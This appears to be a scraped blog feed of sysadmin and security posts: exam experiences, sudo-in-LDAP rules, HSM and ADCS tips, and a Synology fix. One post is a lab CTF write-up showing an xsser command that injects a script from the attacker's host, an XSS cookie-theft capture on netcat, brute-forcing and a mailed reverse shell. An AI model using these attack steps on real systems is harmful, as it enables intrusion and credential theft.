Quantcast
Channel: kilala.nl - Blog posts
Viewing all 173 articles
Browse latest View live

EX413 prep: my cheat sheet

$
0
0

I used Sander van Vugt's EX413/LPI3 video training to prep for my EX413 exam and expanded upon all that information by performing additional research. All in all, I've spent roughly sixty hours over the past five weeks in order to get up to speed. Over the course, over fifty pages of notes were compiled. :)


I've extract all the really important information from my notes, to make this seven-page EX413 cheat sheet. I hope other students find it useful.


Of course, this is NO SUBSTITUTE for doing your own studying and research. Be sure to put in your time, experimenting with all the software you'll need to know. The summary is based on my own knowledge and experience, so I'm sure I've left out lots of things that other people might need to learn.




EX413: it's been one heck of a ride!

$
0
0

2017-11-02: Updates can be found at the bottom.


Five weeks ago, I started a big challenge: pass the RedHat EX413 "certificate of excellence" in Linux server hardening. I've spent roughly sixty hours studying and seven more on the exam, but I've made it! As this post's title suggests it's been one heck of a ride!


Unfortunately, that's not just because of the hard work. 


I prepared for the exam by following Sander van Vugt's Linux Security Hardening video training, at SafariBooks Online. Sander's course focuses on both EX413 and LPI-3 303, so there was quite some material which did not apply to my specific exam. No worries, because it's always useful to repeat known information and to learn new things. Alongside Sander's course I spent a lot of time experimenting in my VM test lab and doing more research with Internet resources. Unfortunately I found Sander's course to be lacking content for one or two key areas of EX413. We have discussed the issues I had with his training and he's assured me that my feedback will find its way into a future update. Good to know. 


Taking the exam was similar to my previous RedHat Kiosk experiences. Back in 2013 I was one of the first hundred people to take a Kiosk exam in the Netherlands (still have the keychain lying around somewhere) and the overall experience is still the same. One change: instead of the workstation with cameras mounted everywhere, I had to work with a Lenovo laptop (good screen, but tiny fonts). The proctor via live chat was polite and responded quickly to my questions.


Now... I said I spent seven hours on the exam: I took it twice. 


Friday 27/10 I needed the full four hours and had not fully finished by the time my clock reached 00:00. This was due to two issues: first, Sander's course had missed one topic completely and second, I had a suspicion that one particular task was literally impossible. Leaving for home, I had a feeling that it could be a narrow "pass". A few hours later I received the verdict: 168/300 points, with 210 being the passing grade. A fail.


I was SO angry! With myself of course, because I felt that I'd messed up something horribly! I knew I hadn't done well, but I didn't expect a 56% score. I put all that anger to good use and booked a retake of the exam immediately. That weekend I spent twelve hours boning up on my problem areas and reviewing the rest.


Come Monday, I arrived at the now familiar laptop first thing in the morning. BAM! BAM! BAM! Most of the tasks I was given were hammered out in quick succession, with a few taking some time because of lengthy command runtimes. In the end I had only one task left: the one which I suspected to be impossible. 


I spoke to the proctor twice about this issue. The first time (1.5 hours into the test) I provided full details of the issue and my explanation for why the task is impossible. The proctor took it up with RedHat support and half an hour later the reply was "this is as intended and is a problem for you to solve". Now I cannot provide you with details about the task, so I'll give you an analogy instead. Task: "Here's a filled-out and signed form. And over here you will find the personnel files for a few employees. Using the signature on the form, ascertain which employee signed the form. Then use his/her personal details to set up a new file.". However, when inspecting the form, you find the signature box to be empty. Blank. There is no signature. 


After finishing all other work I spoke to the proctor again, to reiterate my wish for RedHat to step in. The reply was the same: it works as intended and complaints may be sent to certification-team@. Fine. Since I'd finished all other tasks (and rebooted at least six times along the way to ensure all my work was sound), I finished the exam assuming I'd get a passing score anyway. I felt good! I'd had a good day, banged out the exam in respectable time and I had improved upon my previous results a lot!


I took their suggestion and emailed the Cert Team about the impossible question. Both to help them improve their exams and to get a few extra points on my final score.


A few hours later I was livid.


The results were in: 190/300 points: 63%, where 70% is needed for a pass. All my improved work, with only one unfinished task, had apparently only led to 22pts increase?! And somewhere along the way RedHat says I just left >30% of my points lying around?! No fscking way. 


I sent a follow-up to my first email, politely asking RedHat to consider the impossible assignment, but also to give my exam results a review. I sincerely suspect problems with the automated scoring on my test, because for the life of me I cannot imagine where I went so horribly wrong to miss out on 30% of the full score!


This morning, twentyfour hours after my last email to the Cert Team, I get a new email from the RH Exam Results system. My -first- exam was given a passing score of 210/300. No further feedback at all, just the passing score on the first sitting. 


While I'm very happy to have gotten the EX413, this of course leaves me with some unresolved questions. All three have been fired in RedHat's direction; I hope to have some answers by the end of the week. 



  • Getting the literal passing score of 210/210 feels odd. As if someone thought "let's get him off our backs and simply tick the PASS box". I sincerely hope that's not the case. I expect better of RedHat. 

  • Was I right in saying the assingment was flawed? Was I right in suspecting issues with the auto-grading?

  • Since I apparently did not fail the first sitting, I would like a refund on the second test or a voucher for another exam. These things ain't cheap! 


 


In closing I'd like to say that, despite my bad experiences, I still value RedHat for what they do. They provide solid products (RHEL, IDM/IPA and their many other tools) and their practical exams are important to a field of work rife with simple multiple-choice questions. This is exactly why my less-than-optimal experience saddens me: it marrs the great things Redhat do!


 


Update 2017-11-02:


This morning I received an email from the Certification Team at RedHat, informing me that my report of the bugged assignment was warranted. They had made an updates to the exam which apparently had not been fully tested, allowing the problem I ran into to make it into the production exams. RedHat will be A) updating the exam to resolve the issue B) reissuing scores for other affected candidates. 



PasswordState, Active Directory and Sudo: oh my!

$
0
0

Recently I've gone over a number of options of connecting a Linux environment in an existing Active Directory domain. I won't go into the customer's specifics, but after considering Winbind, SSSD, old school LDAP and commercial offerings like PBIS we went with the modern-yet-free SSSD-based solution. The upside of this approach is that integration is quick and easy. Not much manual labor needed at all. 


What's even cooler, is that SSSD supports sudoers rulesets by default!


With a few tiny adjustments to your configuration and after loading the relevant schema into AD, you're set to go! Jakub Hrozek wrote instructions a while back; they couldn't be simpler!


So now we have AD-based user logins and Sudo rules! That's pretty neat, because not only is our user management centralized, so is the full administration of Sudo! No need to manage /etc/sudoers and /etc/sudoers.d on all your boxen! Config management tools like Puppet or Ansible might make that easier, but one central repo is even nicer! :D


 




 


Now, I've been working with the PasswordState password management platform for a few weeks and so far I love it. Before getting the logins+Sudo centralized, getting the right privileged accounts on the Linux boxen was a bit of a headache. Well, not anymore! What's even cooler, is that using Sudo+LDAP improves upon a design limitation of PasswordState!


Due to the way their plugins are built, Click Studios say you need -two- privileged accounts to manage Linux passwords (source, chapter 14). One that has Defaults:privuser rootpw in sudoers and one that doesn't. All because of how the root password gets validated with the heartbeat script. With Sudoers residing in LDAP this problem goes away! I quote (from the sudoers.ldap man-page):



It is possible to specify per-entry options that override the global default options. /etc/sudoers only supports default options and limited options associated with user/host/commands/aliases. The syntax is complicated and can be difficult for users to understand. Placing the options directly in the entry is more natural.



Would you look at that! :) That means that, per the current build of PasswordState, the privileged user for Linux account management needs the following three sudoers entries in AD / LDAP. 



CN=pstate-ECHO,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/echo
sudoOption = rootpw
sudoUser = pstate


CN=pstate-PASSWDROOT,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd root
sudoOption = rootpw
sudoOrder = 10
sudoUser = pstate


CN=pstate-PASSWD,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd *
sudoUser = pstate



The "sudo echo" is used to validate the root password (because the rootpw option is applied). I only applied the rootpw option to "sudo passwd root" to maintain compatibility with the default script included with PasswordState



Back in the saddle:CompTIA PenTest+

$
0
0

It's been a few months since I last took a certification exam: I closed last year with a speed-run of RedHat's EX413, which was a thrill. Since then, I've taken some time off: got into Civ6, read a few books, caught up on a few shows. But as some of my friends will know, it's never too long before I start feeling that itch again... Time to study!


A few weeks back I learned of the new CompTIA PenTest+ certification. They advertised their new cert with a trial run for the first 400 takers. A beta-test of an exam for $50?! I'm game! Sounds like a lot of fun!


Judging by the reactions on TechExams and Reddit, the test is hard to pin down. CompTIA themselves boast "a need for practical experience", while also providing a VERY extensive list of objectives. Seriously, the list is huge. Reports from test-takers are also all over the place: easy drag-and-drop "simulations", large swathes of multiple-choice questions, a very large focus on four of the big names in scripting, "more challenging than I had expected", or "what CEH should have been".


As for me, my test is booked for 16/04. I don't fully know what to expect, but I intend to have fun! In the mean time I'm using the large list of objectives to simply learn more abou the world of pentesting. My OSCP-certification suggests that I at least understand the basics, but to me it's mostly shown me how much I don't know :) 



Cincero CTF036 - 2018 edition

$
0
0
The battlegrounds

Image credits go to Cincero, who took photos all day.


Another year, another CTF036! No longer under the Ultimum flag, but this time organised by Cincero / Secured by Design. Same awesome people, different company name. The 2016 and 2017 editions were awesome and this year's party lived up to its fame.


As is tradition, the AM was filled with presentations. I was invited to talk as well, but I didn't have anything presentable ready to go; maybe next year! It was a busy day, and Wesley kicked off with DearBytes' findings about the security of home automation systems. Good talk, which had my colleague Dirk's attention because his home is pretty heavily filled with that stuff ;)


Dick and I would be teaming up under the Unixerius flag. Lunch was sorted pretty quickly, so we set up our systems around 12:30. Between us two we had three laptops, with my burner laptop serving as Google-machine through my mobile data connection (the in-house Internet connection wasn't very fast). The casus was consistent with the last years: a description of the target, an explanation why we were hacking their servers and a few leads to get us started. To sum it up:



  • An employee of a Internet payment provider (pay-deal.nl) has gambling debts and needs to pay them off. He's struck a deal where the debts can be paid in credit card numbers, as opposed to actual money. We've been hired to grab as many credit card numbers as possible. 

  • There's a web server, www.pay-deal.nl. There's a webmail box webmail.pay-deal.nl. Supposedly there are at least two workstations. 


First order of business: slurp down anything the DNS would give us (a successful zone transfer showed just the four systems, spread across two ranges) and run some port scans against the front two boxen. Results?



  • The web server runs SMB shares which are accessible, as is the RDP server. Yikes, that's bad. The host appears to run Windows Server 2008, with XAMPP.

  • The web site contains a direct-to-email contactform and a login page for a dashboard. 

  • The mail box runs Squirrelmail, Postfix and a few other mail related services. My NMap scan was too limited, so it missed a "hidden" webapp running on port 1337 :D At the end, Michael explained that this would have been a great spot to try a buffer overflow :)

  • Just like last year, enum4linux failed me completely. It suggested that SMB was working, but that there was no anymous access. It was only when Michael suggested that "I wouldn't trust that output, why don't you have another look?" that I tried smbclient, which was a lot more successful. The share contained seven cards: 70 points. 


While perusing the website, we found a number of valid email addresses for employees to try on Squirrelmail. After going over my old OSCP notes, Dick put together a userlist and got to work with Hydra in hopes of brute-forcing passwords for their accounts. This is where the basic Kali stuff isn't sufficient: there are no wordlists for Dutch targets :) While rockyou.txt is awesome, it won't contain famous passwords such as Welkom01, Maandag2018, Andijvie18 and so on. It's time to start putting together a set of rules and wordlists for Dutch targets! In the end we got into two mailboxes, which got us another seven cards: 140 points. 


Unfortunately we didn't get any points beyond that, despite trying a lot of avenues!


Open SMB shares: Dirk suspected there was more to the open SMB shares, so he focused on those. Turning to Metasploit and others, he hoped to perform a SMB relay attack using the MSF tooling. Michael later confided that EternalBlue would not work (due to patching), but that the SMB redir was in fact the way to go. Unfortunately Dick couldn't get this one to work; more troubleshooting needed. 


Squirrelmail REXEC: Dick noticed that the Squirrelmail version was susceptible to a remote command execution vulnerability. Unfortunately, after quite a bit of trying he concluded that this particular install had been patched. Darn!


Mailing a script: In his own presentation Michael had stressed the importance of simulating human interaction in a CTF, be it through automation or by using a trainee ;) After the rather hamfisted hints in the Squirrelmail boxes we'd opened, Dick decided to look for a Powershell reverse-shell script and to mail it to the guy waiting for "a script to run". Not one minute before the final bell of the CTF did he get a reverse session! It didn't count for points, but that was a nice find of him. 


SQLi in the site: I ran the excellent SQLMap against all forms and variables that I could find in the site. No inroads found. 


XSS in the site: Michael pointed out that one variable on the site should catch my eye, so I went over it all again. Turns out that hoedan.php?topic= is susceptible to cross-site scripting. This is where I needed to start learning, because I'm still an utter newb at this subject. I expected some analogue of SQLMap to exist for XSS and I wasn't wrong! XSSER is a great tool that automates hunting for XSS vulnerabilities! Case in point:


xsser -u "http://www.pay-deal.nl" -g "/hoedan.php?topic=XSS" --auto --Fr "https://172.18.9.8/shell.js"
...
===========================================
[*] Final Results:
===========================================
- Injections: 558
- Failed: 528
- Sucessfull: 30
- Accur: 5 %


Here's a great presentation by the author of XSSER: XSS for fun and profit.


This could be useful! Which is why I tried a few avenues. Using XSSER, Metasploit and some manual work I determined that the XSS wouldn't allow me to run SQL commands, nor include any PHP. Javascript was the thing that was going to fly. Fair enough. 


Now, that website contained a contact form which can be used to submit your own website for inclusion in the payment network. Sounds like a great way to get a "human" to visit your site. 


Browser_autopwn: At first, I used SEToolkit and MSF to run attacks like browser_autopwn2, inserting my own workstations webserver and the relevant URL into the contact form. I certainly got visits and after some tweaking determined that the user came from one of the workstations and was running FireFox 51. Unfortunately, after trying many different payloads, none of them worked. So no go on pwning the browser on the workstation. 


Grabbing dashboard cookies: Another great article I found helped me get on the way with this one: From reflected XSS to shell. My intention was to have the pay-deal administrator visit their own site (with XSS vuln), so I could grab their cookie in hopes of it having authentication information in there. Basically, like this:


http://www.pay-deal.nl/hoedan.php?topic=Registreren”>


While the attack worked and I did get a cookie barfed onto my Netcat listener, it did not contain any authenticating information for the site:


===========================================
connect to [172.18.9.8] from (UNKNOWN) [172.18.8.10] 55469
GET / HTTP/1.1
Host: 172.18.9.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
=========================================== 


Turns out I probably did something wrong, because according to Michael's post-CTF talk this was indeed the inroad to be taken: grab the admin's cookie, login to the dashboard, grab more credit cards and abuse the file upload tool for more LFI fun! Similarly, Dick's attempts at the SMB relay should have also given him inroads to attack the box. We were well on our way, after a bunch of hints. So, we're still pretty big newbs :D


It was an awesome day! I wish I had more spare time, so I could continue the PWK/OSCP online labs and so I could play around with HackTheBox and VulnHub.


EDIT: Here's a great SANS article explaining SMB relay in detail.



CompTIA PenTest+ experience

$
0
0

I've taken the day off, despite things being quite busy at the office, to have a little fun. Specifically, I've just arrived back home after sitting the CompTIA PenTest+ Beta exam. Taking an exam for fun? Absolutely :)


It's no surprise that I first heard about the newly developed exam on Reddit, with the CompTIA team calling for 400 people to take the beta-version of the exam. We're not getting any scores yet, as they'll first tally all the outcomes to determine weaknesses and flaws in questions that may affect scoring negatively. But once the process has completed, if (and that's an IF) you passed you'll gain full accreditation for the cert. All that and a fun day, for just $50? Sign me up :)


Being a non-native english speaker I was given an extension, tackling 110 questions in 220 minutes (instead of 165). That was certainly doable: I got up from my seat with two hours gone. Overall I can say that my impression of the exam is favorable! While one or two specific topics may have stolen the limelight, I can say that my exam covered a diverse array of subjects. The "simulation" questions as they call them were, ehh, okay. They're not what I would call actual simulations, they're more like interactive screens, but I do feel they added something to the experience. 


Yeah! Not bad at all! I would heartily endorse this certification track instead of EC Council's CEH. The latter may have better brand-recognition in EMEA, but CompTIA is still known as a respectable organization. 


So, did I pass? I don't know :) As I said, the subject matter turned out to be very diverse, in a very good way. Thus it also covered things I have zero to very little experience with, while an experienced pen-tester would definitely know. And that's the point: despite passing the OSCP exam last year, I -am- still a newbie pen-tester. So if I fail this exam, then I'll feel that it's a justified failure. 



Microsoft OCSP Responders, nShield HSMs and vagueries

$
0
0

Over the past few months I've built a few PKI environments, all based on Microsoft's ADCS. One of the services I've rolled out is the Microsoft OCSP Responder Array: a group of servers working together to provide OCSP responses across your network. 


I've run into some weirdness with the OCSP Responders, when working with the Thales / nCipher nShield HSMs. For example, the array would consist of a handful of slaves and one master server. Everything'd be running just fine for a week or so, until it's time to refresh the OCSP signing certificates. Then, one out of the array starts misbehaving! All the other nodes are fine, but one of'm just stops serving responses. 


The Windows Event Log contains error codes involving “CRYPT_E_NO_PROVIDER”, “NCCNG_NCryptCreatePersistedKey existing lock file” and "The Online Responder Service could not locatie a signing certificate for configuration XXXX. (Cannot find the original signer)". Now that second one is a big hint!


I haven't found out why yet, but the problem lies in lock files with the HSM's security world. If you check %NFAST_KMDATA%local you'll find a file with "lock" at the end of its name. Normally when requesting a keypair from the HSM, a temporary lock is created which gets removed once the keypair is provided. But for some reason the transaction doesn't finish and the lock file stays in place.


For now, the temporary solution is to:



  1. Stop the Online Responder Service.

  2. Remove the lock file from %NFAST_KMDATA%local.

  3. Restart the Oniine Responder Service


With that out of the way, here's two other random tidbits :)


In some cases the service may throw out errors like "Online Responder failed to create an enrollment request" in close proximity to "This operation requires an interactive window station". This happens when you did not setup the keys to be module-protected. The service is asking your HSM for its keys and the HSM is in turn asking you to provide a quorum of OCS (operator cards). If you want the Windows services to auto-start at boot time, always set their keys up as "module protected". And don't forget to run both capingwizard64.exe and domesticwizard64.exe to set this as the default as well!


Finally, from this awesome presentation which explains common mistakes when building an AD PKI: using certutil -getreg provides boatloads of useful information! For example, in order for OCSP responses to be properly signed after rolling over your keypairs, you'll need to certutil -setreg caUseDefinedCACertInRequest 1.


(Seriously, Mark Cooper is a PKI wizard!)



Matching Windows certificates to nShield protected keys (kmdata)

$
0
0

Over the past few weeks I've had a nagging question: Windows certutil / certlm.msc has an overview of the active certificates and key pairs for a computer system, but when your keys are protected by an Thales nShield HSM you can't get to the private keys. Fair enough. But then there's the %NFAST_KMDATA% directory on the nShield RFS-server, whose local subdirectory contains all of the private keys that are protected by the HSM. And I do mean all the key materials. And those files are not marked in easy to identify ways. 


So my question? Which of the files on the %NFAST_KMDATA%/local ties to which certificate on which HSM-client?


I've finally figured it all out :) Let's go to Powershell!


 



PS C:Windowssystem32> cd cert:LocalMachineMy


PS Cert:LocalMachineMy> dir
   Directory: Microsoft.PowerShell.SecurityCertificate::LocalMachineMy

Thumbprint                                Subject
----------                                -------
F34F7A37C39255FA7E007AE68C1FE3BD92603A0D  CN=testbox, C=thomas, C=NL
...



 


So! After moving into the "Personal" keystore for the local system you can see all certs by simply running dir. This will show you both the thumbprint and the Subject of the cert in question. Using the Powershell Format-List command will show you the interesting meta-info (the example below has many lines remove).


 



PS Cert:LocalMachineMy> dir F34F7A37C39255FA7E007AE68C1FE3BD92603A0D | fl *
...
DnsNameList              : {testbox}
...
HasPrivateKey            : True
PrivateKey               :
PublicKey                : System.Security.Cryptography.X509Certificates.PublicKey
SerialNumber             : 6FE2C038ED73E7A0469E5E3641BD3690
Subject                  : CN=testbox, C=thomas, C=NL


 



Cool! Now, the two bold-printed, underlined lines are interesting, because the system tells you that it does have access to the relevant private key, but it does not have clear informatin as to where this key lives. We can turn to the certutil tool to find the important piece to the puzzle: the key container name


 



PS Cert:LocalMachineMy> certutil -store My F34F7A37C39255FA7E007AE68C1FE3BD92603A0D
...
Serial Number: 6fe2c038ed73e7a0469e5e3641bd3690
Subject: CN=testbox, C=thomas, C=NL
 Key Container = ThomasTest
 Provider = nCipher Security World Key Storage Provider
Private key is NOT exportable
... 



Again, the interesting stuff is bold and underlined. This shows that the private key is accessible through the Key Storage Provider (KSP) "nCipher Security World KSP" and that the relevant container is named "ThomasTest". This name is confirmed by the nShield command to list your keys:


 



PS Cert:LocalMachineMy> cnglist --list-keys
ThomasTest: RSA machine
...



 


Now comes the tricky part: the key management data files (kmdata) don't have a filename tying them to the container names:


 



PS Cert:LocalMachineMy> cd 'C:programdata
CipherKey Management DataLocal'


PS C:programdata
CipherKey Management DataLocal> dir
...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     11:46       5336 key_caping_machine--...
-a---         15-5-2018     13:37       5188 key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4...



 


So, let's try an old-fashioned grep shall we? :)


 



PS C:programdata
CipherKey Management DataLocal> Select-String thomastest *caping_*
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4:2:   ThomasTest  ?   ∂   Vu ?{?%f?&??)?U;?m???   ??  ??  ??  1???B'?????'@??I?MK?+9$KdMt??})???7?em??pm?? ?



 


This suggests that we could inspect the kmdata files and find out their key container name. 


 



PS C:programdata
CipherKey Management DataLocal> kmfile-dump -p key_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest
...



SHAZAM! 


Of course we can also inspect all the key management data files in one go:


 



PS: C:> $Files = Get-ChildItem 'C:ProgramData
CipherKey Management DataLocalkey_caping*'


PS: C:> ForEach ($KMData in $Files) {kmfile-dump -p $KMData | Select -First 7)
C:ProgramData
CipherKey Management DataLocalkey_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest


 





Inventory of certificates, private keys and nShield HSM kmdata files

$
0
0

Building on my previous Thales nShield HSM blog post, here's a nice improvement.


If you make an array with (FQDN) hostnames of HSM-clients you can run the following Powershell script on your RFS-box to traverse all HSM-systems so you can cross-reference their certs to the kmdata files in your nShield RFS.



$Hosts="host1","host2","host3"


ForEach ($TargetHost) in $Hosts)


{
               Invoke-Command -ComputerName $TargetHost -ScriptBlock {
                              $Thumbs=Get-ChildItem cert:LocalMachineMy
                             ForEach ($TP in $Thumbs.thumbprint) {
                                             $BLOB=(certutil -store My $TP);
                                             $HOSTNAME=(hostname);
                                             $SUBJ=($BLOB | Select-String "Subject:").ToString().Replace("Subject: ","");
                                             $CONT=($BLOB | Select-String "Key Container =").ToString().Replace("Key Container = ","").Replace(" ","");
                                             Write-Output "$HOSTNAME $TP ""$SUBJ"" ""$CONT""";
                             }
              }


 
$KeyFiles = Get-ChildItem 'C:ProgramData
CipherKey Management DataLocalkey_caping*'
ForEach ($KMData in $KeyFiles) {
               $CONT=(kmfile-dump -p $KMData | Select -First 7 | Select -Last 1)
               Write-Output "$KMData $CONT";
}



 


For example, output for the previous example would be:


TESTBOX F34F7A37C39255FA7E007AE68C1FE3BD92603A0D "CN=testbox, C=thomas, C=NL" "ThomasTest"


C:ProgramData
CipherKey Management DataLocalkey_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4                    ThomasTest


 


The first line is for host TESTBOX and it shows the certificate for the testbox certificate, with a link to the ThomasTest container. The second line shows the specific kmdata file that is tied to the ThomasTest container. Nice :)



Handy tool to troubleshoot your Microsoft ADCS PKI

$
0
0
Doesn't look like much, but it's great

It has been little over a year now since I started at $CLIENT. I've learned so many new things in those twelve months, it's almost mindboggling. Here's how I described it to an acquaintance recently:



"To say that I’m one lucky guy would be understating things. Little over a year ago I was interviewed to join a project as their “pki guy”: I had very little experience with certificates, had messed around a bit with nShield HSMs, but my customer was willing to take a chance on me. ... ... A year onwards I’ve put together something that I feel is pretty sturdy. ... We have working DTAP environments, the production environment’s been covered with a decent keygen ceremony and I’m training the support crew for their admin-tasks. There’s still plenty of issues to iron out, like our first root/issuing CA renewal in a few weeks, but I’m feeling pretty good about it all."



As I described to them, I feel that I'm at a 5/10 right now when it comes to PKI experience. I have a good grasp of the basics, I understand some of the intricacies, I've dodged a bunch of pitfalls and I've come to know at least one platform.


How little I know about this specific platform (Microsoft's Active Directory Certificate Services) gets reinforced frequently, for example by stumbling upon Brian Komar's reply to this thread. The screenshot above might not look like much, but it made my day yesterday :) "Pkiview.msc" you say? It builds a tree-view of your PKI's structure on the lefthand side and on the right side it will show you all the relevant data points for each CA in the list. 


This is awesome, because it will show you immediately when one of your important pieces of meta-data goes unavailable. For example, in the PKI I built I have a bunch of clones of the CRL Distribution Point (CDP) spread across the network. Oddly, these clones were lighting up red in the pkiview tool. Turns out that the cloning script had died a whiles back, without any of us noticing. 


So yeah, it may not look like much, but that's one great troubleshooting tool :)



Keywords for this week: Windows, Linux, PKI and DAMTA

$
0
0

It's gonna be a busy week! 


Most importantly, I'll be taking CQure's "DAMTA" training: Defense Against Modern Targeted Attacks. Basically, an introduction to threat hunting and improved Blue Teaming. Sounds like it's going to be a blast and I'm looking forward to it a lot :)


Unfortunately this also means I'll be gone from the office at $CLIENT for three days; that bits, 'cause I'm in the midst of a lot of PKi and security-related activities. To make sure I don't fall behind too much I'm running most of my experiments in the evenings and weekend. 


For example, I've spent a few hours this weekend on setting up a Microsoft ADCS NDES server, which integrates with my Active Directory setup and the base ADCS. My Windows domain works swimmingly, but now it's time to integrate Linux. Now I'm looking at tools like SSCEP and CertMonger to get the show on the road. To make things even cooler, I'll also integrate both my Kali and my CentOS servers with AD. 


Busy, busy, busy :)



Synology vagueries: slow transfers, 100% volume util, very high load average, very high IOWAIT

$
0
0

I've been a very happy user of Synology systems for quite a few years now. The past few weeks I've ran into quite some performance issues though, so I decided to get to the bottom of it.


Symptoms:



  • CPU usage is low, with <15% active usage.

  • CPU usage is stuck on 70-85% IOWAIT.

  • My load average is very high, at 14.xx consistently.

  • The performance monitoring tool shows 100% volume utilization.

  • Very low transfer speeds to/from the NAS.

  • Very long connection times on the file shares.

  • Very slow logins and bad response times on SSH and the web interface.


I have undertaken a few steps that seem to have gotten me in the right direction...



  1. I have gone over the list of active services and disabled the ones I do not use.

  2. I verified the installed packages and I've removed all the things I really don't need.

  3. I have disabled the Universal Search function, which cannot be disabled without trickery (see below).

  4. I have disabled the Indexing daemon in full, which also cannot be disabled without extra effort (also below).


In order to disable Universal Search:



  1. Login through SSH

  2. cd /var/packages/SynoFinder

  3. sudo cp INFO INFO.orig

  4. sudo vi INFO


Make the following changes:



ctl_stop="yes"
ctl_uninstall="yes"



You can now restart Package Center in the GUI, browse to Universal Search / SynoFinder and stop the service. You could even uninstall it if you like.


In order to disable the Indexer daemon:



  1. Login through SSH

  2. sudo synoservice --hard-stop synoindexd

  3. sudo synoservice --disable synoindexd


The second step is needed to also stop and disable the synomkthumb and synomkflvd services, which rely upon the synoindexd.


One reboot later and things have quieted down. I'll keep an eye on things the next few days.



CFR-310 beta exam experience

$
0
0

I guess I've found a new hobby: taking beta-versions of cybersec certification exams. :)


Three months ago I took the CompTIA Pentest+ beta and not half an hour ago I finished the CertNexus CFR-310 beta. Like before, I learned about the beta-track through /r/netsecstudents where it was advertised with a discount code bringing the $250 exam down to $40 and ultimately $20. Regardless of whether the certification has any real-world value, that's a nice amount to spend on some fun!


To sum up my experience:



  • The Examity proctored, on-premise test-taking works very well. They don't use nasty installers that run software with admin privs on your system, they simply use GoToMeeting to monitor your mic, cam and screen. Effective and not too intrusive.

  • The questions were a nice mix between technical knowledge (knowing various tools and some basic scripting and flags) and procedural knowledge (policies, standards, regulations, processes). 

  • Overall the required level of expertise seems rather basic and in retrospect it feels like most of the information can/will be spoonfed during the classroom/online cours.


Now... Is the CFR-310 certification "worth it"? As I've remarked on Peerlyst earlier this week: it depends.


If you have a specific job requirement to pass this cert, then yes it's obviously worth it. Then again, most likely your employer or company will spring for the exam and it won't be any skin off your back. And if you're a forward thinking contractor looking to get assignments with the DoD, then it could certainly be useful to sit the exam as it's on the DoD 8570 list for two CSSP positions.


If, like me, you're relatively free to spend your training budget and you're looking for something fun to spend a few weeks on, then I'd suggest you move on to CompTIA's offerings. CertNexus / Logical Operations are not names I'd heard before and CompTIA is a household-name in IT; has been for years. 



Passed the PenTest+ beta exam!

$
0
0

A bit over three months ago, I took part in CompTIA's beta version of the PenTest+ exam. It was a fun and learning experience and despite having some experience, I didn't expect to pass. 


Turns out, I did! I passed with an 821 out of 900 score :D 


Now, I hope that some of the feedback I provided has been useful. That's the point of those beta exams, isn't it?



Another quarter, another beta

$
0
0

I took the CompTIA Linux+ beta (XK1-004) today and I wasn't very impressed... It's "ok".


I have no recent experience with LPIC or with the previous version of Linux+, only with LPIC from ten years ago. Based on that I feel that the new Linux+ is less... exciting? thrilling? than what I'd expect from LPIC. It feels to me like a traditional Linux-junior exam with its odd fascination on TAR, but with modern subjects (like Git or virtualization) tacked on the side.


Personally I disliked one of the PBQ's, with a simulated terminal. This simulation would only accept the exact, literal command and parameter combinations that have been programmed into it. Anything else, any other permutation of flags, results in the same error message. Imagine my frustration when a command that I run almost daily to solve the question at hand is not accepted, because I'm not using the exact flags or the order thereof that they want me to type. 


Anyway. I'm glad that I took the beta, simply to get more feeling of the (international) market place. Now at least I'll know what the cert entails, should I ever see it on an applicant's resumé. :)




Query ADCS (Active Directory Certificate Services) for certificate details

$
0
0

I think Microsoft's ADCS is quite a nice platform to work with, as far as PKI systems go. I've heard people say that it's one of the nicest out there, but given its spartan interface that kind of makes me worry for the competitors! One of the things I've fought with, was querying the database backend, to find certificates matching specific details. It took me a lot of Googling and messing around to come up with the following examples.


 


To get the details of a specific request:



certutil -view -restrict "requestid=381"



 


To show all certificate requests submitted by myself:



certutil -view -restrict "requestername=domain\t.sluijter"



 


To show all certificates that I requested, displaying the serial numbers, the requestor's name and the CN on the certificate. It'll even show some statistics at the bottom:



certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,requestername,commonname"



 


Show all certificates provided to TESTBOX001. The query language is so unwieldy that you'll have to ask for "hosts >testbox001 and <testbox002".



certutil -view -restrict "commonname>testbox001,commonname<testbox002" -out "serialnumber,requestername,commonname"



 


A certificate request's disposition will show you errors that occured during submission, but it'll also show other useful data. Issued certificates will show whom approved the issuance. The downside to this is that the approver's name will disappear once the certificate is revoked. So you'll need to retain the auditing logs for ADCS!



certutil -view -restrict "requestid=381" -out "commonname,requestername,disposition,dispositionmessage"    


certutil -view -restrict "requestid=301" -out "commonname,requestername,disposition,dispositionmessage"    



 


Would you like to find out which certificate requests I approved? Then we'll need to add a bit more Powershell.



certutil -view -out "serialnumber,dispositionmessage" | select-string "Resubmitted by DOMAIN\t.sluijter"



 


Or even better yet:



certutil -view -out "serialnumber,dispositionmessage" | ForEach {


    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}


    if ($_ -match "^.*Request Disposition Message:.*Resubmitted by DOMAIN\t.sluijter"){ Write-Output "$serial" }


    }


 



Or something very important: do you want to find certificates that I both request AND approved? That's a bad situation to be in...



certutil -view -restrict "requestername=domain\t.sluijter" -out "serialnumber,dispositionmessage" | ForEach {


    if ($_ -match "^.*Serial Number:"){$serial = $_.Split('"')[1]}


